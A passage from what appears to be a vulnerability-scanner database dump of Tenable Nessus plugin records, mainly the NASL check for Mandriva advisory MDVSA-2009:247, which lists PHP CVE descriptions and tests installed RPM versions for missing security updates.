yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-odbc-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-openssl-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-pcntl-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-pdo-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-pdo_dblib-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-pdo_mysql-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-pdo_odbc-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-pdo_pgsql-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-pdo_sqlite-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif 
(rpm_check(release:\"MDK2008.0\", reference:\"php-pgsql-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-posix-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-pspell-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-readline-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-recode-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-session-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-shmop-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-simplexml-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-snmp-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-soap-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-sockets-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-sqlite-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-suhosin-0.9.22-1.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-sysvmsg-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-sysvsem-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-sysvshm-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-tidy-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-tokenizer-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-wddx-5.2.4-3.6mdv2008.0\", 
yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-xml-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-xmlreader-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-xmlrpc-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-xmlwriter-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-xsl-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-zlib-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T11:52:19", "description": "Multiple vulnerabilities was discovered and corrected in php :\n\nThe dba_replace function in PHP 5.2.6 and 4.x allows context-dependent\nattackers to cause a denial of service (file truncation) via a key\nwith the NULL byte. NOTE: this might only be a vulnerability in\nlimited circumstances in which the attacker can modify or add database\nentries but does not have permissions to truncate the file\n(CVE-2008-7068).\n\nThe php_openssl_apply_verification_policy function in PHP before\n5.2.11 does not properly perform certificate validation, which has\nunknown impact and attack vectors, probably related to an ability to\nspoof certificates (CVE-2009-3291).\n\nUnspecified vulnerability in PHP before 5.2.11 has unknown impact and\nattack vectors related to missing sanity checks around exif\nprocessing. (CVE-2009-3292)\n\nUnspecified vulnerability in the imagecolortransparent function in PHP\nbefore 5.2.11 has unknown impact and attack vectors related to an\nincorrect sanity check for the color index. (CVE-2009-3293). 
However\nin Mandriva we don't use the bundled libgd source in php per default,\nthere is a unsupported package in contrib named php-gd-bundled that\neventually will get updated to pickup these fixes.\n\nThis update provides a solution to these vulnerabilities.", "edition": 25, "published": "2009-09-28T00:00:00", "title": "Mandriva Linux Security Advisory : php (MDVSA-2009:247)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3292", "CVE-2008-7068", "CVE-2009-3291", "CVE-2009-3293"], "modified": "2009-09-28T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:php-xmlwriter", "p-cpe:/a:mandriva:linux:php-fcgi", "p-cpe:/a:mandriva:linux:php-json", "p-cpe:/a:mandriva:linux:php-bcmath", "p-cpe:/a:mandriva:linux:php-gd", "p-cpe:/a:mandriva:linux:php-pdo", "p-cpe:/a:mandriva:linux:php-calendar", "p-cpe:/a:mandriva:linux:php-mbstring", "p-cpe:/a:mandriva:linux:php-mhash", "p-cpe:/a:mandriva:linux:php-sysvmsg", "p-cpe:/a:mandriva:linux:php-ming", "p-cpe:/a:mandriva:linux:php-posix", "p-cpe:/a:mandriva:linux:php-cgi", "p-cpe:/a:mandriva:linux:php-pcntl", "p-cpe:/a:mandriva:linux:php-hash", "p-cpe:/a:mandriva:linux:php-zlib", "p-cpe:/a:mandriva:linux:php-openssl", "p-cpe:/a:mandriva:linux:php-soap", "p-cpe:/a:mandriva:linux:php-xml", "p-cpe:/a:mandriva:linux:php-ftp", "p-cpe:/a:mandriva:linux:php-dom", "p-cpe:/a:mandriva:linux:php-curl", "p-cpe:/a:mandriva:linux:php-sysvsem", "p-cpe:/a:mandriva:linux:php-ctype", "cpe:/o:mandriva:linux:2009.0", "p-cpe:/a:mandriva:linux:php-sockets", "p-cpe:/a:mandriva:linux:php-gmp", "p-cpe:/a:mandriva:linux:php-sysvshm", "p-cpe:/a:mandriva:linux:php-dbase", "p-cpe:/a:mandriva:linux:php-pdo_pgsql", "p-cpe:/a:mandriva:linux:php-pdo_mysql", "p-cpe:/a:mandriva:linux:php-xmlrpc", "p-cpe:/a:mandriva:linux:php-bz2", "cpe:/o:mandriva:linux:2008.1", "p-cpe:/a:mandriva:linux:php-ldap", "p-cpe:/a:mandriva:linux:php-xsl", "p-cpe:/a:mandriva:linux:php-tidy", "p-cpe:/a:mandriva:linux:lib64php5_common5", "p-cpe:/a:mandriva:linux:php-ncurses", 
"p-cpe:/a:mandriva:linux:php-xmlreader", "p-cpe:/a:mandriva:linux:php-cli", "p-cpe:/a:mandriva:linux:php-mssql", "p-cpe:/a:mandriva:linux:php-sqlite", "p-cpe:/a:mandriva:linux:php-session", "p-cpe:/a:mandriva:linux:php-readline", "p-cpe:/a:mandriva:linux:php-pdo_sqlite", "p-cpe:/a:mandriva:linux:libphp5_common5", "p-cpe:/a:mandriva:linux:php-tokenizer", "p-cpe:/a:mandriva:linux:php-pgsql", "p-cpe:/a:mandriva:linux:php-recode", "p-cpe:/a:mandriva:linux:php-gettext", "p-cpe:/a:mandriva:linux:php-imap", "p-cpe:/a:mandriva:linux:php-iconv", "p-cpe:/a:mandriva:linux:php-devel", "p-cpe:/a:mandriva:linux:php-pdo_dblib", "p-cpe:/a:mandriva:linux:php-exif", "p-cpe:/a:mandriva:linux:php-odbc", "p-cpe:/a:mandriva:linux:php-pdo_odbc", "p-cpe:/a:mandriva:linux:php-snmp", "p-cpe:/a:mandriva:linux:php-mysql", "p-cpe:/a:mandriva:linux:php-pspell", "p-cpe:/a:mandriva:linux:php-mime_magic", "p-cpe:/a:mandriva:linux:php-filter", "p-cpe:/a:mandriva:linux:php-sybase", "p-cpe:/a:mandriva:linux:php-wddx", "p-cpe:/a:mandriva:linux:php-dba", "p-cpe:/a:mandriva:linux:php-mcrypt", "p-cpe:/a:mandriva:linux:php-shmop", "p-cpe:/a:mandriva:linux:php-mysqli"], "id": "MANDRIVA_MDVSA-2009-247.NASL", "href": "https://www.tenable.com/plugins/nessus/41639", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2009:247. 
\n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(41639);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2008-7068\", \"CVE-2009-3291\", \"CVE-2009-3292\", \"CVE-2009-3293\");\n script_bugtraq_id(36449);\n script_xref(name:\"MDVSA\", value:\"2009:247\");\n\n script_name(english:\"Mandriva Linux Security Advisory : php (MDVSA-2009:247)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities was discovered and corrected in php :\n\nThe dba_replace function in PHP 5.2.6 and 4.x allows context-dependent\nattackers to cause a denial of service (file truncation) via a key\nwith the NULL byte. NOTE: this might only be a vulnerability in\nlimited circumstances in which the attacker can modify or add database\nentries but does not have permissions to truncate the file\n(CVE-2008-7068).\n\nThe php_openssl_apply_verification_policy function in PHP before\n5.2.11 does not properly perform certificate validation, which has\nunknown impact and attack vectors, probably related to an ability to\nspoof certificates (CVE-2009-3291).\n\nUnspecified vulnerability in PHP before 5.2.11 has unknown impact and\nattack vectors related to missing sanity checks around exif\nprocessing. (CVE-2009-3292)\n\nUnspecified vulnerability in the imagecolortransparent function in PHP\nbefore 5.2.11 has unknown impact and attack vectors related to an\nincorrect sanity check for the color index. (CVE-2009-3293). 
However\nin Mandriva we don't use the bundled libgd source in php per default,\nthere is a unsupported package in contrib named php-gd-bundled that\neventually will get updated to pickup these fixes.\n\nThis update provides a solution to these vulnerabilities.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64php5_common5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libphp5_common5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-cgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-dbase\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-exif\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-fcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-filter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-hash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mhash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mime_magic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-ming\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mssql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mysqli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-openssl\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:mandriva:linux:php-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pdo_dblib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pdo_mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pdo_odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pdo_pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pdo_sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-posix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-readline\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-session\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sockets\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sybase\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sysvshm\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:mandriva:linux:php-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2008.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2009.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") 
audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"x86_64\", reference:\"lib64php5_common5-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"i386\", reference:\"libphp5_common5-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-bcmath-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-bz2-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-calendar-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-cgi-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-cli-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-ctype-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-curl-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-dba-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-dbase-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-devel-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-dom-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-exif-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-fcgi-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-filter-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-ftp-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", 
reference:\"php-gd-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-gettext-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-gmp-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-hash-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-iconv-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-imap-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-json-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-ldap-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-mbstring-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-mcrypt-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-mhash-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-mime_magic-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-ming-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-mssql-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-mysql-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-mysqli-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-ncurses-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-odbc-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-openssl-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif 
(rpm_check(release:\"MDK2008.1\", reference:\"php-pcntl-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-pdo-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-pdo_dblib-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-pdo_mysql-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-pdo_odbc-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-pdo_pgsql-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-pdo_sqlite-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-pgsql-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-posix-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-pspell-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-readline-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-recode-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-session-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-shmop-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-snmp-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-soap-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-sockets-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-sqlite-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", 
reference:\"php-sysvmsg-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-sysvsem-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-sysvshm-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-tidy-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-tokenizer-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-wddx-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-xml-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-xmlreader-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-xmlrpc-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-xmlwriter-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-xsl-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-zlib-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2009.0\", cpu:\"x86_64\", reference:\"lib64php5_common5-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"i386\", reference:\"libphp5_common5-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-bcmath-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-bz2-5.2.6-18.7mdv2009.0\", 